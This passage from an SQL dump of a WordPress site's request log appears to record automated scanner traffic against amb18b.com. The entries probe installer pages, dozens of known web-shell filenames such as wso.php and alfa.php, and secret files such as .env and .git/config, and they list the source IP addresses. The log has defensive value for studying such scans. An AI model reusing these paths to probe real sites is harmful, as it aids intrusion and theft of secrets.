Access',1,'2025-11-01 13:08:42','2025-11-01 13:08:42'),(2898,'https://amb18b.com/wordpress/wp-admin/install.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:08:44','2025-11-01 13:08:44'),(2899,'https://amb18b.com/wp/wp-admin/setup-config.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:08:46','2025-11-01 13:08:46'),(2900,'https://amb18b.com/wp/wp-admin/install.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:08:48','2025-11-01 13:08:48'),(2901,'https://amb18b.com/new/wp-admin/setup-config.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:08:50','2025-11-01 13:08:50'),(2902,'https://amb18b.com/new/wp-admin/install.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:08:53','2025-11-01 13:08:53'),(2903,'https://amb18b.com/old/wp-admin/setup-config.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:08:55','2025-11-01 13:08:55'),(2904,'https://amb18b.com/old/wp-admin/install.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:08:57','2025-11-01 13:08:57'),(2905,'https://amb18b.com/blog/wp-admin/setup-config.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:08:59','2025-11-01 13:08:59'),(2906,'https://amb18b.com/blog/wp-admin/install.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:09:02','2025-11-01 13:09:02'),(2907,'https://amb18b.com/test/wp-admin/setup-config.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:09:04','2025-11-01 13:09:04'),(2908,'https://amb18b.com/test/wp-admin/install.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:09:18','2025-11-01 13:09:18'),(2909,'https://amb18b.com/shop/wp-admin/setup-config.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:09:21','2025-11-01 13:09:21'),(2910,'https://amb18b.com/shop/wp-admin/install.php?step=1&language=en_GB','128.90.141.3','Direct Access',1,'2025-11-01 13:09:24','2025-11-01 13:09:24'),(2911,'https://amb18b.com/xc.php','172.192.64.10','Direct Access',1,'2025-11-01 14:15:40','2025-11-01 14:15:40'),(2912,'https://amb18b.com/g.php','172.192.64.10','Direct Access',1,'2025-11-01 14:15:41','2025-11-01 14:15:41'),(2913,'https://amb18b.com/20.php','172.192.64.10','Direct Access',1,'2025-11-01 14:15:42','2025-11-01 14:15:42'),(2914,'https://amb18b.com/build.php','172.192.64.10','Direct Access',1,'2025-11-01 14:15:43','2025-11-01 14:15:43'),(2915,'https://amb18b.com/r.php','172.192.64.10','Direct Access',1,'2025-11-01 14:15:45','2025-11-01 14:15:45'),(2916,'https://amb18b.com/v4.php','172.192.64.10','Direct Access',1,'2025-11-01 14:15:46','2025-11-01 14:15:46'),(2917,'https://amb18b.com/ee.php','172.192.64.10','Direct Access',1,'2025-11-01 14:15:47','2025-11-01 14:15:47'),(2918,'https://amb18b.com/go.php?p=','172.192.64.10','Direct Access',1,'2025-11-01 14:15:48','2025-11-01 14:15:48'),(2919,'https://amb18b.com/an.php','172.192.64.10','Direct Access',1,'2025-11-01 14:15:49','2025-11-01 14:15:49'),(2920,'https://amb18b.com/wp.php','172.192.64.10','Direct Access',1,'2025-11-01 14:15:50','2025-11-01 14:15:50'),(2921,'https://amb18b.com/admin.php?p=','172.192.64.10','Direct Access',1,'2025-11-01 14:15:52','2025-11-01 14:15:52'),(2922,'https://amb18b.com/inputs.php?p=','172.192.64.10','Direct Access',1,'2025-11-01 14:15:53','2025-11-01 14:15:53'),(2923,'https://amb18b.com/lv.php','172.192.64.10','Direct Access',1,'2025-11-01 14:15:54','2025-11-01 14:15:54'),(2924,'https://amb18b.com/chosen.php?','172.192.64.10','Direct Access',1,'2025-11-01 14:15:55','2025-11-01 14:15:55'),(2925,'https://amb18b.com/config.php?','172.192.64.10','Direct Access',1,'2025-11-01 14:15:57','2025-11-01 14:15:57'),(2926,'https://amb18b.com/tiny.php?p=','172.192.64.10','Direct Access',1,'2025-11-01 14:15:58','2025-11-01 14:15:58'),(2927,'https://amb18b.com/as.php','172.192.64.10','Direct Access',1,'2025-11-01 14:15:59','2025-11-01 14:15:59'),(2928,'https://amb18b.com/1.php?','172.192.64.10','Direct Access',1,'2025-11-01 14:16:00','2025-11-01 14:16:00'),(2929,'https://amb18b.com/css.php','172.192.64.10','Direct Access',1,'2025-11-01 14:16:01','2025-11-01 14:16:01'),(2930,'https://amb18b.com/public_html','172.192.64.10','Direct Access',1,'2025-11-01 14:16:03','2025-11-01 14:16:03'),(2931,'https://amb18b.com/CLA.php','172.192.64.10','Direct Access',1,'2025-11-01 14:16:04','2025-11-01 14:16:04'),(2932,'https://amb18b.com/aa.php','172.192.64.10','Direct Access',1,'2025-11-01 14:16:05','2025-11-01 14:16:05'),(2933,'https://amb18b.com/nx.php','172.192.64.10','Direct Access',1,'2025-11-01 14:16:06','2025-11-01 14:16:06'),(2934,'https://amb18b.com/1aa.php','172.192.64.10','Direct Access',1,'2025-11-01 14:16:08','2025-11-01 14:16:08'),(2935,'https://amb18b.com/0x.php','172.192.64.10','Direct Access',1,'2025-11-01 14:16:10','2025-11-01 14:16:10'),(2936,'https://amb18b.com/403.php','172.192.64.10','Direct Access',1,'2025-11-01 14:16:11','2025-11-01 14:16:11'),(2937,'https://amb18b.com/test.php','172.192.64.10','Direct Access',1,'2025-11-01 14:16:12','2025-11-01 14:16:12'),(2938,'https://amb18b.com/alfa.php','172.192.64.10','Direct Access',1,'2025-11-01 14:16:13','2025-11-01 14:16:13'),(2939,'https://amb18b.com/ot.php','172.192.64.10','Direct Access',1,'2025-11-01 14:16:14','2025-11-01 14:16:14'),(2940,'https://amb18b.com/k.php','172.192.64.10','Direct Access',1,'2025-11-01 14:16:16','2025-11-01 14:16:16'),(2941,'https://amb18b.com/s.php','172.192.64.10','Direct Access',1,'2025-11-01 14:16:17','2025-11-01 14:16:17'),(2942,'https://amb18b.com/link.php','74.176.185.3','Direct Access',2,'2025-11-01 14:27:31','2025-11-01 14:26:49'),(2943,'https://amb18b.com/chosen.php?p=','74.176.185.3','Direct Access',1,'2025-11-01 14:26:51','2025-11-01 14:26:51'),(2944,'https://amb18b.com/mail.php','74.176.185.3','Direct Access',1,'2025-11-01 14:26:52','2025-11-01 14:26:52'),(2945,'https://amb18b.com/lock360.php','74.176.185.3','Direct Access',1,'2025-11-01 14:26:53','2025-11-01 14:26:53'),(2946,'https://amb18b.com/function.php','74.176.185.3','Direct Access',1,'2025-11-01 14:26:54','2025-11-01 14:26:54'),(2947,'https://amb18b.com/classwithtostring.php','74.176.185.3','Direct Access',1,'2025-11-01 14:26:56','2025-11-01 14:26:56'),(2948,'https://amb18b.com/1.php','74.176.185.3','Direct Access',1,'2025-11-01 14:26:58','2025-11-01 14:26:58'),(2949,'https://amb18b.com/autoload_classmap.php?p=','74.176.185.3','Direct Access',1,'2025-11-01 14:26:59','2025-11-01 14:26:59'),(2950,'https://amb18b.com/post.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:01','2025-11-01 14:27:01'),(2951,'https://amb18b.com/wp-conflg.php?p=','74.176.185.3','Direct Access',1,'2025-11-01 14:27:02','2025-11-01 14:27:02'),(2952,'https://amb18b.com/manager.php?p=','74.176.185.3','Direct Access',1,'2025-11-01 14:27:03','2025-11-01 14:27:03'),(2953,'https://amb18b.com/alfa.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:05','2025-11-01 14:27:05'),(2954,'https://amb18b.com/goods.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:06','2025-11-01 14:27:06'),(2955,'https://amb18b.com/wp-trackback.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:07','2025-11-01 14:27:07'),(2956,'https://amb18b.com/about.php?p=','74.176.185.3','Direct Access',1,'2025-11-01 14:27:08','2025-11-01 14:27:08'),(2957,'https://amb18b.com/themes.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:11','2025-11-01 14:27:11'),(2958,'https://amb18b.com/simple.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:12','2025-11-01 14:27:12'),(2959,'https://amb18b.com/class.php?p=','74.176.185.3','Direct Access',1,'2025-11-01 14:27:14','2025-11-01 14:27:14'),(2960,'https://amb18b.com/as.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:15','2025-11-01 14:27:15'),(2961,'https://amb18b.com/file.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:16','2025-11-01 14:27:16'),(2962,'https://amb18b.com/bless.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:18','2025-11-01 14:27:18'),(2963,'https://amb18b.com/alfanew.php','74.176.185.3','Direct Access',2,'2025-11-01 14:28:13','2025-11-01 14:27:20'),(2964,'https://amb18b.com/404.php?fm=true','74.176.185.3','Direct Access',1,'2025-11-01 14:27:21','2025-11-01 14:27:21'),(2965,'https://amb18b.com/ini.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:22','2025-11-01 14:27:22'),(2966,'https://amb18b.com/fm.php?p=','74.176.185.3','Direct Access',1,'2025-11-01 14:27:23','2025-11-01 14:27:23'),(2967,'https://amb18b.com/atomlib.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:25','2025-11-01 14:27:25'),(2968,'https://amb18b.com/inputs.php?p=','74.176.185.3','Direct Access',1,'2025-11-01 14:27:26','2025-11-01 14:27:26'),(2969,'https://amb18b.com/moon.php?p=','74.176.185.3','Direct Access',1,'2025-11-01 14:27:27','2025-11-01 14:27:27'),(2970,'https://amb18b.com/lv.php','74.176.185.3','Direct Access',2,'2025-11-01 14:28:11','2025-11-01 14:27:28'),(2971,'https://amb18b.com/cong.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:29','2025-11-01 14:27:29'),(2972,'https://amb18b.com/buy.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:32','2025-11-01 14:27:32'),(2973,'https://amb18b.com/zfile.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:33','2025-11-01 14:27:33'),(2974,'https://amb18b.com/css.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:34','2025-11-01 14:27:34'),(2975,'https://amb18b.com/radio.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:35','2025-11-01 14:27:35'),(2976,'https://amb18b.com/wp.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:36','2025-11-01 14:27:36'),(2977,'https://amb18b.com/abcd.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:37','2025-11-01 14:27:37'),(2978,'https://amb18b.com/nc4.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:39','2025-11-01 14:27:39'),(2979,'https://amb18b.com/wso.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:40','2025-11-01 14:27:40'),(2980,'https://amb18b.com/rss.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:41','2025-11-01 14:27:41'),(2981,'https://amb18b.com/ant.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:42','2025-11-01 14:27:42'),(2982,'https://amb18b.com/ioxi-o.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:43','2025-11-01 14:27:43'),(2983,'https://amb18b.com/wpc.php?p=','74.176.185.3','Direct Access',1,'2025-11-01 14:27:44','2025-11-01 14:27:44'),(2984,'https://amb18b.com/js.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:45','2025-11-01 14:27:45'),(2985,'https://amb18b.com/ar.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:47','2025-11-01 14:27:47'),(2986,'https://amb18b.com/xmrlpc.php?p=','74.176.185.3','Direct Access',1,'2025-11-01 14:27:48','2025-11-01 14:27:48'),(2987,'https://amb18b.com/c.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:49','2025-11-01 14:27:49'),(2988,'https://amb18b.com/byp.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:50','2025-11-01 14:27:50'),(2989,'https://amb18b.com/fm1.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:52','2025-11-01 14:27:52'),(2990,'https://amb18b.com/doc.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:53','2025-11-01 14:27:53'),(2991,'https://amb18b.com/Angelv2.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:54','2025-11-01 14:27:54'),(2992,'https://amb18b.com/acp.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:55','2025-11-01 14:27:55'),(2993,'https://amb18b.com/gdn.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:57','2025-11-01 14:27:57'),(2994,'https://amb18b.com/asas.php','74.176.185.3','Direct Access',1,'2025-11-01 14:27:58','2025-11-01 14:27:58'),(2995,'https://amb18b.com/123.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:00','2025-11-01 14:28:00'),(2996,'https://amb18b.com/v1.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:01','2025-11-01 14:28:01'),(2997,'https://amb18b.com/v2.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:03','2025-11-01 14:28:03'),(2998,'https://amb18b.com/rk2.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:05','2025-11-01 14:28:05'),(2999,'https://amb18b.com/222.php?p=','74.176.185.3','Direct Access',1,'2025-11-01 14:28:06','2025-11-01 14:28:06'),(3000,'https://amb18b.com/wp-22.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:07','2025-11-01 14:28:07'),(3001,'https://amb18b.com/lc.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:08','2025-11-01 14:28:08'),(3002,'https://amb18b.com/mini.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:10','2025-11-01 14:28:10'),(3003,'https://amb18b.com/m.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:14','2025-11-01 14:28:14'),(3004,'https://amb18b.com/db.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:15','2025-11-01 14:28:15'),(3005,'https://amb18b.com/aks.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:16','2025-11-01 14:28:16'),(3006,'https://amb18b.com/f.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:17','2025-11-01 14:28:17'),(3007,'https://amb18b.com/wp-files.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:19','2025-11-01 14:28:19'),(3008,'https://amb18b.com/cloud.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:20','2025-11-01 14:28:20'),(3009,'https://amb18b.com/asa.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:21','2025-11-01 14:28:21'),(3010,'https://amb18b.com/gecko-litespeed.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:23','2025-11-01 14:28:23'),(3011,'https://amb18b.com/bolt.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:24','2025-11-01 14:28:24'),(3012,'https://amb18b.com/NewFile.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:25','2025-11-01 14:28:25'),(3013,'https://amb18b.com/otuz1.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:26','2025-11-01 14:28:26'),(3014,'https://amb18b.com/classwithtostring.php?p=','74.176.185.3','Direct Access',1,'2025-11-01 14:28:28','2025-11-01 14:28:28'),(3015,'https://amb18b.com/info.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:30','2025-11-01 14:28:30'),(3016,'https://amb18b.com/mlex.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:31','2025-11-01 14:28:31'),(3017,'https://amb18b.com/file1.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:32','2025-11-01 14:28:32'),(3018,'https://amb18b.com/11.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:34','2025-11-01 14:28:34'),(3019,'https://amb18b.com/warm.PhP7','74.176.185.3','Direct Access',1,'2025-11-01 14:28:35','2025-11-01 14:28:35'),(3020,'https://amb18b.com/zxl.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:36','2025-11-01 14:28:36'),(3021,'https://amb18b.com/wp-wso.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:38','2025-11-01 14:28:38'),(3022,'https://amb18b.com/uana.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:39','2025-11-01 14:28:39'),(3023,'https://amb18b.com/a.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:40','2025-11-01 14:28:40'),(3024,'https://amb18b.com/ayk.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:42','2025-11-01 14:28:42'),(3025,'https://amb18b.com/gawean.PhP7','74.176.185.3','Direct Access',1,'2025-11-01 14:28:43','2025-11-01 14:28:43'),(3026,'https://amb18b.com/inc.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:44','2025-11-01 14:28:44'),(3027,'https://amb18b.com/api.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:46','2025-11-01 14:28:46'),(3028,'https://amb18b.com/ioxi-rex4.php7','74.176.185.3','Direct Access',1,'2025-11-01 14:28:48','2025-11-01 14:28:48'),(3029,'https://amb18b.com/million.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:49','2025-11-01 14:28:49'),(3030,'https://amb18b.com/include.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:50','2025-11-01 14:28:50'),(3031,'https://amb18b.com/bala.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:52','2025-11-01 14:28:52'),(3032,'https://amb18b.com/category.tokens.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:54','2025-11-01 14:28:54'),(3033,'https://amb18b.com/mari.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:55','2025-11-01 14:28:55'),(3034,'https://amb18b.com/json.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:56','2025-11-01 14:28:56'),(3035,'https://amb18b.com/new.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:57','2025-11-01 14:28:57'),(3036,'https://amb18b.com/woh.php','74.176.185.3','Direct Access',1,'2025-11-01 14:28:59','2025-11-01 14:28:59'),(3037,'https://amb18b.com//wp-includes/wlwmanifest.xml','34.186.126.155','Direct Access',1,'2025-11-01 15:02:35','2025-11-01 15:02:35'),(3038,'https://amb18b.com//?author=2','34.186.126.155','Direct Access',1,'2025-11-01 15:02:38','2025-11-01 15:02:38'),(3039,'https://amb18b.com//?author=3','34.186.126.155','Direct Access',1,'2025-11-01 15:02:39','2025-11-01 15:02:39'),(3040,'https://amb18b.com/sites/all/libraries/elfinder/connectors/php/connector.php','37.49.148.167','Direct Access',1,'2025-11-01 18:37:36','2025-11-01 18:37:36'),(3041,'https://amb18b.com/wso.php','185.137.178.121','Direct Access',1,'2025-11-01 19:13:28','2025-11-01 19:13:28'),(3042,'https://amb18b.com/shell.php','185.137.178.121','Direct Access',1,'2025-11-01 19:13:28','2025-11-01 19:13:28'),(3043,'https://amb18b.com/xleet-shell.php','185.137.178.121','Direct Access',1,'2025-11-01 19:13:29','2025-11-01 19:13:29'),(3044,'https://amb18b.com/xleet.php','185.137.178.121','Direct Access',1,'2025-11-01 19:13:29','2025-11-01 19:13:29'),(3045,'https://amb18b.com/admin.php','185.137.178.121','Direct Access',1,'2025-11-01 19:13:29','2025-11-01 19:13:29'),(3046,'https://amb18b.com/profile.php','185.137.178.121','Direct Access',1,'2025-11-01 19:13:29','2025-11-01 19:13:29'),(3047,'https://amb18b.com/admin-header.php','185.137.178.121','Direct Access',1,'2025-11-01 19:13:30','2025-11-01 19:13:30'),(3048,'https://amb18b.com/options-reading.php','185.137.178.121','Direct Access',1,'2025-11-01 19:13:30','2025-11-01 19:13:30'),(3049,'https://amb18b.com/shell.php','37.204.160.239','Direct Access',1,'2025-11-01 19:22:02','2025-11-01 19:22:02'),(3050,'https://amb18b.com/xleet.php','37.204.160.239','Direct Access',1,'2025-11-01 19:22:02','2025-11-01 19:22:02'),(3051,'https://amb18b.com/wso.php','37.204.160.239','Direct Access',1,'2025-11-01 19:22:02','2025-11-01 19:22:02'),(3052,'https://amb18b.com/admin-header.php','37.204.160.239','Direct Access',1,'2025-11-01 19:22:03','2025-11-01 19:22:03'),(3053,'https://amb18b.com/profile.php','37.204.160.239','Direct Access',1,'2025-11-01 19:22:03','2025-11-01 19:22:03'),(3054,'https://amb18b.com/xleet-shell.php','37.204.160.239','Direct Access',1,'2025-11-01 19:22:03','2025-11-01 19:22:03'),(3055,'https://amb18b.com/admin.php','37.204.160.239','Direct Access',1,'2025-11-01 19:22:03','2025-11-01 19:22:03'),(3056,'https://amb18b.com/options-reading.php','37.204.160.239','Direct Access',1,'2025-11-01 19:22:03','2025-11-01 19:22:03'),(3057,'https://amb18b.com//wp-includes/wlwmanifest.xml','157.66.55.50','Direct Access',1,'2025-11-01 23:06:33','2025-11-01 23:06:33'),(3058,'https://amb18b.com//?author=2','157.66.55.50','Direct Access',1,'2025-11-01 23:06:35','2025-11-01 23:06:35'),(3059,'https://amb18b.com/wp-admin/js/index.php','2602:fa59:9:1143::1','Direct Access',1,'2025-11-02 00:43:00','2025-11-02 00:43:00'),(3060,'https://amb18b.com/wp-admin/images/index.php','2602:fa59:9:1143::1','Direct Access',1,'2025-11-02 00:43:19','2025-11-02 00:43:19'),(3061,'https://amb18b.com/wp-admin/css/index.php','2602:fa59:9:1143::1','Direct Access',1,'2025-11-02 00:43:50','2025-11-02 00:43:50'),(3062,'https://amb18b.com/wp-includes/SimplePie/Content/Type/index.php','2602:fa59:9:1143::1','Direct Access',1,'2025-11-02 00:44:17','2025-11-02 00:44:17'),(3063,'https://amb18b.com/wp-includes/Requests/Auth/index.php','2602:fa59:9:1143::1','Direct Access',1,'2025-11-02 00:44:44','2025-11-02 00:44:44'),(3064,'https://amb18b.com/wp-admin/css/colors/index.php','2602:fa59:9:1143::1','Direct Access',1,'2025-11-02 00:45:07','2025-11-02 00:45:07'),(3065,'https://amb18b.com/geju.php','2602:fa59:9:1143::1','Direct Access',1,'2025-11-02 00:48:09','2025-11-02 00:48:09'),(3066,'https://amb18b.com/geju.php','2602:fa59:9:1143::1','Direct Access',1,'2025-11-02 00:48:11','2025-11-02 00:48:11'),(3067,'https://amb18b.com/wp.php','2602:fa59:9:1143::1','Direct Access',1,'2025-11-02 00:48:14','2025-11-02 00:48:14'),(3068,'https://amb18b.com/wp.php','2602:fa59:9:1143::1','Direct Access',1,'2025-11-02 00:48:17','2025-11-02 00:48:17'),(3069,'https://amb18b.com/graphql','142.93.0.66','Direct Access',1,'2025-11-02 08:30:38','2025-11-02 08:30:38'),(3070,'https://amb18b.com/api','142.93.0.66','Direct Access',1,'2025-11-02 08:30:39','2025-11-02 08:30:39'),(3071,'https://amb18b.com/api/graphql','142.93.0.66','Direct Access',1,'2025-11-02 08:30:40','2025-11-02 08:30:40'),(3072,'https://amb18b.com/graphql/api','142.93.0.66','Direct Access',1,'2025-11-02 08:30:41','2025-11-02 08:30:41'),(3073,'https://amb18b.com/api/gql','142.93.0.66','Direct Access',1,'2025-11-02 08:30:42','2025-11-02 08:30:42'),(3074,'https://amb18b.com/swagger-ui.html','142.93.0.66','Direct Access',1,'2025-11-02 08:30:43','2025-11-02 08:30:43'),(3075,'https://amb18b.com/swagger/index.html','142.93.0.66','Direct Access',1,'2025-11-02 08:30:44','2025-11-02 08:30:44'),(3076,'https://amb18b.com/swagger/swagger-ui.html','142.93.0.66','Direct Access',1,'2025-11-02 08:30:45','2025-11-02 08:30:45'),(3077,'https://amb18b.com/webjars/swagger-ui/index.html','142.93.0.66','Direct Access',1,'2025-11-02 08:30:46','2025-11-02 08:30:46'),(3078,'https://amb18b.com/swagger.json','142.93.0.66','Direct Access',1,'2025-11-02 08:30:47','2025-11-02 08:30:47'),(3079,'https://amb18b.com/swagger/v1/swagger.json','142.93.0.66','Direct Access',1,'2025-11-02 08:30:48','2025-11-02 08:30:48'),(3080,'https://amb18b.com/v2/api-docs','142.93.0.66','Direct Access',1,'2025-11-02 08:30:49','2025-11-02 08:30:49'),(3081,'https://amb18b.com/v3/api-docs','142.93.0.66','Direct Access',1,'2025-11-02 08:30:50','2025-11-02 08:30:50'),(3082,'https://amb18b.com/api-docs/swagger.json','142.93.0.66','Direct Access',1,'2025-11-02 08:30:51','2025-11-02 08:30:51'),(3083,'https://amb18b.com/api/swagger.json','142.93.0.66','Direct Access',1,'2025-11-02 08:30:52','2025-11-02 08:30:52'),(3084,'https://amb18b.com/@vite/env','142.93.0.66','Direct Access',1,'2025-11-02 08:30:53','2025-11-02 08:30:53'),(3085,'https://amb18b.com/actuator/env','142.93.0.66','Direct Access',1,'2025-11-02 08:30:54','2025-11-02 08:30:54'),(3086,'https://amb18b.com/server','142.93.0.66','Direct Access',1,'2025-11-02 08:30:54','2025-11-02 08:30:54'),(3087,'https://amb18b.com/.vscode/sftp.json','142.93.0.66','Direct Access',1,'2025-11-02 08:30:55','2025-11-02 08:30:55'),(3088,'https://amb18b.com/about','142.93.0.66','Direct Access',1,'2025-11-02 08:30:56','2025-11-02 08:30:56'),(3089,'https://amb18b.com/debug/default/view?panel=config','142.93.0.66','Direct Access',1,'2025-11-02 08:30:57','2025-11-02 08:30:57'),(3090,'https://amb18b.com/v2/_catalog','142.93.0.66','Direct Access',1,'2025-11-02 08:30:58','2025-11-02 08:30:58'),(3091,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','142.93.0.66','Direct Access',1,'2025-11-02 08:30:59','2025-11-02 08:30:59'),(3092,'https://amb18b.com/server-status','142.93.0.66','Direct Access',1,'2025-11-02 08:30:59','2025-11-02 08:30:59'),(3093,'https://amb18b.com/login.action','142.93.0.66','Direct Access',1,'2025-11-02 08:31:00','2025-11-02 08:31:00'),(3094,'https://amb18b.com/_all_dbs','142.93.0.66','Direct Access',1,'2025-11-02 08:31:01','2025-11-02 08:31:01'),(3095,'https://amb18b.com/.DS_Store','142.93.0.66','Direct Access',1,'2025-11-02 08:31:02','2025-11-02 08:31:02'),(3096,'https://amb18b.com/.env','142.93.0.66','Direct Access',1,'2025-11-02 08:31:03','2025-11-02 08:31:03'),(3097,'https://amb18b.com/.git/config','142.93.0.66','Direct Access',1,'2025-11-02 08:31:03','2025-11-02 08:31:03'),(3098,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','142.93.0.66','Direct Access',1,'2025-11-02 08:31:04','2025-11-02 08:31:04'),(3099,'https://amb18b.com/config.json','142.93.0.66','Direct Access',1,'2025-11-02 08:31:04','2025-11-02 08:31:04'),(3100,'https://amb18b.com/telescope/requests','142.93.0.66','Direct Access',1,'2025-11-02 08:31:05','2025-11-02 08:31:05'),(3101,'https://amb18b.com/info.php','142.93.0.66','Direct Access',1,'2025-11-02 08:31:06','2025-11-02 08:31:06'),(3102,'https://amb18b.com//wp-includes/wlwmanifest.xml','136.118.37.191','Direct Access',1,'2025-11-02 09:41:34','2025-11-02 09:41:34'),(3103,'https://amb18b.com//?author=2','136.118.37.191','Direct Access',1,'2025-11-02 09:41:37','2025-11-02 09:41:37'),(3104,'https://amb18b.com//?author=3','136.118.37.191','Direct Access',1,'2025-11-02 09:41:38','2025-11-02 09:41:38'),(3105,'https://amb18b.com/ws.php','13.79.168.144','Direct Access',1,'2025-11-02 16:46:55','2025-11-02 16:46:55'),(3106,'https://amb18b.com/.well-known/ws.php','13.79.168.144','Direct Access',1,'2025-11-02 16:46:58','2025-11-02 16:46:58'),(3107,'https://amb18b.com/lufix.php','13.79.168.144','Direct Access',1,'2025-11-02 16:47:03','2025-11-02 16:47:03'),(3108,'https://amb18b.com/thai.php','13.79.168.144','Direct Access',1,'2025-11-02 16:47:11','2025-11-02 16:47:11'),(3109,'https://amb18b.com/fifi.php','13.79.168.144','Direct Access',1,'2025-11-02 16:47:23','2025-11-02 16:47:23'),(3110,'https://amb18b.com/fifii.php','13.79.168.144','Direct Access',1,'2025-11-02 16:47:31','2025-11-02 16:47:31'),(3111,'https://amb18b.com/667.php','13.79.168.144','Direct Access',1,'2025-11-02 16:47:45','2025-11-02 16:47:45'),(3112,'https://amb18b.com/700.php','13.79.168.144','Direct Access',1,'2025-11-02 16:48:00','2025-11-02 16:48:00'),(3113,'https://amb18b.com/c4.php','13.79.168.144','Direct Access',1,'2025-11-02 16:48:21','2025-11-02 16:48:21'),(3114,'https://amb18b.com/.well-known/acme-challenge/mariju.php','13.79.168.144','Direct Access',1,'2025-11-02 16:48:51','2025-11-02 16:48:51'),(3115,'https://amb18b.com/update/f35.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:03','2025-11-02 16:49:03'),(3116,'https://amb18b.com/vv.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:07','2025-11-02 16:49:07'),(3117,'https://amb18b.com/wp-blog.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:10','2025-11-02 16:49:10'),(3118,'https://amb18b.com/dropdown.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:12','2025-11-02 16:49:12'),(3119,'https://amb18b.com/wp-admin/js/index.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:14','2025-11-02 16:49:14'),(3120,'https://amb18b.com/foo.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:16','2025-11-02 16:49:16'),(3121,'https://amb18b.com/alfa.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:19','2025-11-02 16:49:19'),(3122,'https://amb18b.com/function/function.php?p=','13.79.168.144','Direct Access',1,'2025-11-02 16:49:21','2025-11-02 16:49:21'),(3123,'https://amb18b.com/v.php','13.79.168.144','Direct Access',1,'2025-11-02 